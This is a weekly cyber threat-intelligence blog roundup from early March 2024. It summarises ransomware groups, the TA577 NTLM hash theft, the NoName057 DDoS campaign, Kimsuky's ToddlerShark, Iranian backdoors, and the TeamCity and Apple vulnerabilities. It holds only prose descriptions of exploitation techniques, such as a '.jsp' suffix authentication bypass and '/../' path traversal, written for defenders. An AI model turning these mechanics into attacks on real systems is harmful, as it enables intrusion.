March 8: Top Threat Actors, Malware, Vulnerabilities and Exploits

The Blue Report 2024

Get a comprehensive analysis of over 136 million cyber attacks and understand the state of threat exposure management.

DOWNLOAD

Welcome to Picus Security's weekly cyber threat intelligence roundup! 

Each month, our goal is to provide insights into the most recent and key malware attacks and vulnerability exploitation campaigns that could potentially affect your industry and region. Recognizing that a blog might not fully cater to your specific threat intelligence requirements, we're excited to introduce a new platform. This platform is crafted to deliver the most customized cyber threat intelligence, directly addressing your unique needs.

Our new threat intelligence tool will enable you to identify threats targeting your region and sector, understand your security posture in comparison to similar organizations, and receive easy-to-implement mitigation signatures from a variety of vendors. Additionally, it will offer a report that you can use to communicate with your peers or within your organization, ensuring that you are well-informed and prepared to address cyber threats effectively.

March 8: Top Threat Actors Observed In Wild

Here are the top threat actors that were active in the first week of March.

LockBit 3.0 Strikes Again: Fashion Titan Jovani in the Crosshairs

  • Threat Actor: LockBit 3.0 Ransomware Group

  • Origin of the Threat Actor: Russia 

  • Victim Location: U.S.

  • Victim & Victim Sector: Jovani Fashion & Manufacturing 

The LockBit 3.0 ransomware group has targeted Jovani Fashion, Ltd. [1], a distinguished entity in the fashion world, renowned for its prom and evening attire, and established in 1983 in New York City with significant revenues of $30.6 million. The details of the cyberattack are still under wraps, as there are no visible disruptions on Jovani's official website, and the company has yet to confirm the incident. If the attack is substantiated, the implications could be severe for Jovani, potentially affecting its business operations, customer relationships, and stakeholder trust, especially if sensitive data was compromised.

Image Source: Twitter

This incident is a part of LockBit's recent wave of activities, where they allegedly added multiple new victims to their list, demonstrating their ongoing threat despite recent law enforcement efforts to neutralize their operations. In February 2024, a joint operation by the Department of Justice, the UK's National Crime Agency, and the FBI aimed to dismantle LockBit's infrastructure to impede their capabilities. However, the group's apparent resurgence and claim of new victims highlight the persistent and evolving challenge of ransomware threats, emphasizing the crucial need for robust cybersecurity defenses in today's digital landscape.

Threat Actor TA577 Exploits Windows' NTLM Authentication Vulnerability to Pass-the-Hash to Their Victims' Systems

  • Threat Actor: TA577

  • Origin of the Threat Actor: Russia

  • Malware: Pikabot

  • Victim Location and Sectors: Globally

The cybercriminal group TA577 has been identified as deploying a unique attack mechanism aimed at stealing NT LAN Manager (NTLM) authentication data through emails that hijack existing threads [2], delivering zipped HTML attachments to victims. 

Once opened, these HTML files initiate a connection to a malicious external SMB server to capture NTLM hashes by exploiting the NTLMv2 Challenge/Response [3] protocol. This technique, which leverages the Impacket toolkit on the SMB server, allows TA577 to acquire sensitive authentication credentials without distributing malware directly. Such credentials can be used in further attacks, including "Pass-The-Hash" activities, to escalate privileges and facilitate lateral movement within the compromised networks. 

Organizations are advised to implement stringent outbound SMB traffic controls to mitigate this threat and protect against potential data breaches and system infiltrations stemming from this sophisticated credential theft tactic.

The BlackCat Ransomware Group Staged an Exit Scam, Stealing $22 Million Ransom

  • Threat Actor: BlackCat/ALPHV Ransomware Group

  • Origin of the Threat Actor: Russian Speaking Operators 

  • Victim Location: U.S.

  • Victim & Victim Sector : Change Healthcare (under Optum) & Healthcare

In early March 2024, the BlackCat/ALPHV ransomware group executed an exit scam by shutting down its operations and allegedly embezzling a $22 million ransom paid by Optum to prevent the release of stolen data from Change Healthcare [4]. They initially took down their Tor data leak blog and negotiation servers, signaling the beginning of their exit. Subsequently, they changed their status to 'GG' ('good game') on the Tox messaging platform, suggesting the end of their operations, and announced the sale of their malware source code for $5 million [5].

The exit scam unfolded against a backdrop of internal strife, with an affiliate accusing the group of stealing the ransom. This affiliate claimed they were responsible for the Change Healthcare attack and were deprived of their share of the ransom, leading to a public outcry on hacker forums. In fact, the affiliates issued their own warning about working with ALPHV crooks: "Be careful everyone and stop deal[ing] with ALPHV [6]."

Despite these events and their fake claims of FBI interference, law enforcement agencies, including the FBI and NCA, denied any involvement in the group's apparent takedown. This incident underscores the treacherous nature of ransomware groups and the complexities of cyber extortion schemes, particularly when large sums and critical data are involved.

Project DDoSia: Russia’s NoName057 Hacktivist Group Planning a Massive DDoS Attack on European Countries

  • Threat Actor: NoName057 Hacktivist Group

  • Origin of the Threat Actor: Russia

  • Victim Location: Ukraine, Finland, Italy (European Nations)

  • Victim Sectors: Government, Transportation and Banking

The hacktivist group NoName057(16) has been adapting its strategies amidst the Ukraine-Russia conflict, focusing on large-scale distributed denial-of-service (DDoS) attacks against Ukraine's supporters, mainly targeting NATO member states through their Project DDoSia initiative [7]. Researchers’ tracking of NoName057(16)'s command-and-control (C2) infrastructure has revealed notable enhancements in the DDoS tool they deploy, including improved compatibility across various processor architectures and operating systems. These updates also feature tailored software versions for users in different locations, advising Russian users to use VPNs, and implementing advanced encryption for secure data communication between the users and C2 servers.

Despite facing stability issues with their C2 servers, leading to frequent location changes, NoName057(16)'s attacks have primarily focused on European nations, with Ukraine, Finland, and Italy being significantly affected [8]. This aligns with the geopolitical tensions and the group's intent to influence government actions, particularly in nations supporting Ukraine. The consistent targeting of government, transportation, and banking sectors underscores the strategic nature of these cyberattacks, aimed at disrupting economic and political stability.

March 8: Latest Malware Attacks

Here are the malware attacks and campaigns that were active in the first week of March.

Kimsuky APT Exploiting ScreenConnect Vulnerabilities to Drop ToddlerShark Malware

  • Threat Actor: Kimsuky (with aliases Thallium, Velvet Chollima)

  • Origin of the Threat Actor: North Korea

  • Malware: ToddlerShark, BabyShark, ReconShark

  • CVEs: CVE-2024-1708, CVE-2024-1709

  • Victim Location: United States, Europe, Asia

Researchers have identified that the North Korean APT group Kimsuky is exploiting vulnerabilities in the ScreenConnect application to deploy a malware variant dubbed TODDLERSHARK, closely related to the previously known BABYSHARK malware [9]. 

Kimsuky targeted two critical vulnerabilities in ScreenConnect, CVE-2024-1708 and CVE-2024-1709, to gain unauthorized access and execute code remotely. The attack sequence begins with the exploitation of these vulnerabilities to run malicious commands via cmd.exe, leveraging mshta.exe to fetch and execute a VBScript-based payload from a remote server [10].

The VBScript payload is heavily obfuscated, using randomly generated function and variable names along with a significant amount of hexadecimal encoded and junk code to evade detection. This script eventually downloads and executes a second payload, which performs a series of malicious activities, including modifying Windows registry keys to lower security settings for macros, collecting sensitive information from the system, and establishing persistence through scheduled tasks. The collected data is exfiltrated to the attacker's server, potentially facilitating further malicious actions. 

UNC1549's Tortoiseshell Hacking Campaign Installs Two Unique Backdoors: MINIBIKE and MINIBUS

  • Threat Actor: UNC1549

  • Origin of the Threat Actor: Iran

  • Malware: MINIBIKE and MINIBUS Backdoors

  • Victim Location: Israel, UAE, Türkiye, India and Albania

  • Victim Sectors: Aerospace, Aviation, and Defense Industries 

An ongoing cyber-espionage campaign, attributed to an Iranian group identified as UNC1549 and associated with the Tortoiseshell operation [11], targets aerospace, aviation, and defense industries across the Middle East, particularly in Israel and the UAE, with potential activities extending to Türkiye, India, and Albania

Initiated around June 2022, this campaign employs unique malware, including backdoors named MINIBIKE and MINIBUS, to infiltrate and gather intelligence from its targets. MINIBIKE, detected since June 2022 and active until at least October 2023, facilitates file exfiltration and command execution, utilizing Microsoft Azure cloud infrastructure to evade detection. MINIBUS, introduced in August 2023 and observed as recently as January, enhances the attackers' capabilities with a more sophisticated code-execution interface and improved reconnaissance functionalities. These tools, alongside a custom tunneler known as LIGHTRAIL, are instrumental in this campaign's efforts to stealthily penetrate and spy on pivotal sectors, aligning with the broader geopolitical tensions involving Iran.

March 8: Latest Vulnerabilities and Exploits

Here are the latest vulnerabilities and exploits observed in the first week of March.

CVE-2024-27198 and CVE-2024-27199: JetBrains TeamCity Authentication Bypass Vulnerabilities Posing Great Risk

CVE-2024-27198 is a critical vulnerability in JetBrains TeamCity that allows an attacker to execute remote code without authentication due to a flaw in the BaseController class of the web-openapi.jar library [12]. This vulnerability is triggered when an API endpoint receives a specially crafted request that includes a ".jsp" extension, effectively bypassing the authentication mechanism. Attackers can exploit this to perform unauthorized actions, such as adding a new administrator account, by sending a manipulated HTTP POST request. This gives the attacker the ability to execute remote commands with administrator privileges, posing a severe security risk as it can lead to full control over the TeamCity CI/CD servers.

CVE-2024-27199, while less severe, still presents a substantial risk by allowing unauthorized information disclosure and system modification due to a CWE-23 weakness across various API endpoints. This vulnerability can be exploited through a path traversal attack using a double dot segment ("/../") in a request, enabling attackers to bypass authentication and access or alter restricted data and settings. For instance, an attacker could view diagnostic information or upload a malicious HTTPS certificate to the TeamCity server without being detected. This vulnerability highlights the importance of stringent input validation and authentication checks in web applications to prevent unauthorized access and potential system compromise.

CVE-2024-23225 & CVE-2024-23296: Apple Issues Critical Updates for Actively Exploited Zero-Day Flaws

Apple has issued critical security updates [13] to address two zero-day vulnerabilities, CVE-2024-23225 and CVE-2024-23296, that have been actively exploited [14]. 

CVE-2024-23225 is associated with a memory corruption issue in the kernel, allowing attackers with kernel-level access to bypass memory protections. Similarly, CVE-2024-23296 involves a memory corruption issue within the RTKit real-time operating system (RTOS), presenting the same level of threat. These vulnerabilities enable attackers with arbitrary kernel read and write capabilities to circumvent kernel memory protections, though specific details on how these flaws are being exploited remain undisclosed.

Apple's response includes improved validation measures introduced in their latest software updates: iOS 17.4, iPadOS 17.4, iOS 16.7.6, and iPadOS 16.7.6, targeting a range of devices from iPhone 8 and iPad 5th generation to newer models. This action follows Apple's earlier intervention in January 2024, where they resolved a type confusion issue in WebKit. These efforts are part of a broader cybersecurity initiative, with the U.S. Cybersecurity and Infrastructure Security Agency (CISA) highlighting the urgency of addressing such vulnerabilities, notably against the backdrop of other identified exploits affecting various devices and systems.

References

[1] S. Jain, “LockBit Hits Again: Renowned Fashion Brand Jovani Targeted in Ransomware Attack,” The Cyber Express, Mar. 04, 2024. Available: https://thecyberexpress.com/cyberattack-on-jovani-fashion/. [Accessed: Mar. 06, 2024]

[2] A. Mascellino, “TA577 Exploits NTLM Authentication Vulnerability,” Infosecurity Magazine, Mar. 04, 2024. Available: https://www.infosecurity-magazine.com/news/ta577-exploits-ntlm-authentication/. [Accessed: Mar. 06, 2024]

[3] “TA577’s Unusual Attack Chain Leads to NTLM Data Theft,” Proofpoint, Feb. 29, 2024. Available: https://www.proofpoint.com/us/blog/threat-insight/ta577s-unusual-attack-chain-leads-ntlm-data-theft. [Accessed: Mar. 06, 2024]

[4] I. Ilascu, “BlackCat ransomware turns off servers amid claim they stole $22 million ransom,” BleepingComputer, Mar. 04, 2024. Available: https://www.bleepingcomputer.com/news/security/blackcat-ransomware-turns-off-servers-amid-claim-they-stole-22-million-ransom/. [Accessed: Mar. 06, 2024]

[5] I. Ilascu, “BlackCat ransomware shuts down in exit scam, blames the ‘feds,’” BleepingComputer, Mar. 05, 2024. Available: https://www.bleepingcomputer.com/news/security/blackcat-ransomware-shuts-down-in-exit-scam-blames-the-feds/. [Accessed: Mar. 06, 2024]

[6] J. Lyons, “Change Healthcare attack latest: ALPHV bags $22M in Bitcoin amid affiliate drama,” The Register, Mar. 04, 2024. Available: https://www.theregister.com/2024/03/04/alphv_ransom_payment/. [Accessed: Mar. 06, 2024]

[7] “Project DDoSia - Russian Hackers ‘NoName057(16)’ Planning Massive DDoS Attack,” Cyber Security News, Mar. 05, 2024. Available: https://cybersecuritynews.com/roject-ddosia-noname05716-massive-ddos-attack/. [Accessed: Mar. 06, 2024]

[8] A. Mascellino, “Hacktivist Collective NoName057(16) Strikes European Targets,” Infosecurity Magazine, Mar. 04, 2024. Available: https://www.infosecurity-magazine.com/news/hacktivist-collective-noname057/. [Accessed: Mar. 06, 2024]

[9] B. Toulas, “ScreenConnect flaws exploited to drop new ToddlerShark malware,” BleepingComputer, Mar. 04, 2024. Available: https://www.bleepingcomputer.com/news/security/screenconnect-flaws-exploited-to-drop-new-toddlershark-malware/. [Accessed: Mar. 06, 2024]

[10] K. Wojcieszek, G. Glass, and D. Truman, “TODDLERSHARK: ScreenConnect Vulnerability Exploited to Deploy BABYSHARK Variant,” Kroll. Available: https://www.kroll.com/en/insights/publications/cyber/screenconnect-vulnerability-exploited-to-deploy-babyshark. [Accessed: Mar. 06, 2024]

[11] J. Warminsky, “Suspected Iranian cyber-espionage campaign targets Middle East aerospace, defense industries.” Available: https://therecord.media/iran-cyber-espionage-campaign-targeting-middle-east-defense-aerospace. [Accessed: Mar. 06, 2024]

[12] H. C. Yuceel, “CVE-2024-27198 and CVE-2024-27199: JetBrains TeamCity Authentication Bypass Vulnerabilities Explained,” Mar. 06, 2024. Available: https://www.picussecurity.com/resource/blog/cve-2024-27198-cve-2024-27199. [Accessed: Mar. 06, 2024]

[13] “About the security content of iOS 17.4 and iPadOS 17.4,” Apple Support, Mar. 05, 2024. Available: https://support.apple.com/en-us/HT214081. [Accessed: Mar. 06, 2024]

[14] 2024newsroom Mar 06, “Urgent: Apple Issues Critical Updates for Actively Exploited Zero-Day Flaws,” The Hacker News, Mar. 06, 2024. Available: https://thehackernews.com/2024/03/urgent-apple-issues-critical-updates.html. [Accessed: Mar. 06, 2024]